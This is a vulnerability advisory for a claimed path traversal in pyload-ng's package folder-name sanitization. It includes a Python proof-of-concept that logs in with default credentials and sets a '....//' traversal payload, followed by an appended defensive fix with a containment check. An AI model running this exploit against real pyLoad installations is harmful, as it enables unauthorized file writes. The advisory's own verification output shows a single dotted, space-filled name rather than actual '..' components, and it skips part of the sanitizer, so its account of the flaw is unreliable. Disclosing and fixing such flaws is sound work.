PT-2026-37263 · Pypi · Pyload-Ng
Published 2026-05-05 · Updated 2026-05-05 · CVE-2026-42314
CVSS v3.1: 6.5 (Medium)
Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
Insufficient sanitization of package folder names allows writing files outside the intended download directory.
Affected Component
src/pyload/core/api/__init__.py - Function: add_package()
Description
Package folder names are sanitized using insufficient string replacement:
folder = (
    folder.replace("http://", "")
    .replace("https://", "")
    .replace("../", " ")  # Bypassable!
    .replace("..", " ")
    .replace(":", "")
    .replace("/", " ")
    .replace("\\", " ")  # backslash assumed here; the character was lost in extraction
)
The ../ replacement is bypassable. The pattern ....// becomes .. after replacement (partial removal), leaving .. which can be exploited when the path is later resolved by the OS.
Proof of Concept
Setup
pip install pyload-ng[all]
pyload -d &
# Default credentials: pyload / pyload
Exploit
#!/usr/bin/env python3
import requests

BASE_URL = "http://localhost:8000"
USERNAME = "pyload"
PASSWORD = "pyload"

session = requests.Session()

# Login with the default credentials from the setup step
session.post(f"{BASE_URL}/login", data={
    "username": USERNAME,
    "password": PASSWORD
})

# Create package with malicious folder name
# The pattern ....// bypasses the ../ replacement
# After sanitization: .. (still contains ..)
folder_payload = "....//....//....//tmp/evil"

resp = session.post(f"{BASE_URL}/api/add_package", json={
    "name": "test package",
    "links": ["http://example.com/file.txt"],
    "dest": 1  # Destination.QUEUE
})
package_id = resp.json()
print(f"Created package: {package_id}")

# Set malicious folder name on the package just created
resp = session.post(f"{BASE_URL}/api/set_package_data", json={
    "package_id": package_id,
    "data": {"folder": folder_payload}
})
print(f"Set folder payload: {folder_payload}")
print(f"Response: {resp.status_code}")

# When download occurs, files will be written outside download dir
print("[+] When a file is downloaded, it will be written to manipulated path")
print("    The sanitized folder still contains '..' sequences that OS resolves")
Verification
Check where files would be written:
import os

download_dir = "/home/user/Downloads"
folder = "....//....//....//tmp/evil"

# Simulate pyLoad's sanitization: only the "../" and "/" replacements
# from the chain above are applied here
sanitized = folder.replace("../", " ").replace("/", " ")
print(f"After pyLoad sanitization: {sanitized}")
# Output: ..  ..  ..  tmp evil

# When pyLoad does os.path.join and then opens the file:
final_path = os.path.join(download_dir, sanitized)
print(f"Joined path: {final_path}")
# Output: /home/user/Downloads/..  ..  ..  tmp evil
# The .. sequences remain and could be resolved by OS during file operations
Impact
Authenticated users with ADD permission can:
- Write files outside the download directory
- Potentially overwrite system files (depending on permissions)
- Clutter system directories with downloaded content
Fix
Path traversal
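As an added example, not pyLoad's code and not the project's fix, the following shows the control a defender would want in place of the replace chain quoted in the Description: an allow-list sanitizer for the folder name plus a containment check that resolves the joined path with os.path.realpath and refuses anything outside the download directory, which is the check the Verification section's simulation lacks. The helper names, the base directory and the plain "../outside" input are constructed for this example; the other input is the folder name from the proof of concept.

```python
import os
import re

# Constructed base directory; the folder name is the advisory's PoC payload.
DOWNLOAD_DIR = "/home/user/Downloads"
ADVISORY_PAYLOAD = "....//....//....//tmp/evil"


def safe_folder_name(folder: str) -> str:
    """Allow-list sanitizer (hypothetical helper, not pyLoad's API).

    Rather than deleting known-bad substrings, keep only characters that can
    never act as a path separator, then refuse names made only of dots,
    spaces or underscores, which would be '.' or '..' style components."""
    name = re.sub(r"^https?://", "", folder.strip())
    name = re.sub(r"[^A-Za-z0-9._ -]", "_", name)
    if not name or set(name) <= {".", " ", "_"}:
        raise ValueError(f"folder name rejected: {folder!r}")
    return name


def resolve_inside(base_dir: str, folder: str) -> str:
    """Containment check (hypothetical helper): join, let realpath resolve
    '..' and symlinks, and require the result to stay under base_dir.
    This check holds no matter how the name was sanitized beforehand."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, folder))
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"path escapes {base}: {target}")
    return target


def package_dir(base_dir: str, folder: str) -> str:
    """Apply both layers and return the directory the package may use."""
    return resolve_inside(base_dir, safe_folder_name(folder))


def escapes(base_dir: str, raw_folder: str) -> bool:
    """True when the unsanitized name, joined naively, leaves base_dir;
    shows what the containment check alone would catch."""
    try:
        resolve_inside(base_dir, raw_folder)
        return False
    except ValueError:
        return True


def name_accepted(folder: str) -> bool:
    """True when the allow-list sanitizer accepts the name."""
    try:
        safe_folder_name(folder)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # The PoC payload collapses to a single, separator-free component.
    print(package_dir(DOWNLOAD_DIR, ADVISORY_PAYLOAD))
    # A plain traversal (constructed input) fails the containment check.
    print(escapes(DOWNLOAD_DIR, "../outside"))
    print(name_accepted(".."))
```

The two layers are deliberately independent: the allow-list turns every separator into an underscore so the name can only ever be one path component, and the realpath/commonpath comparison rejects escapes even if a future change to the sanitizer reintroduces a gap.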
Affected Products
Pyload-Ng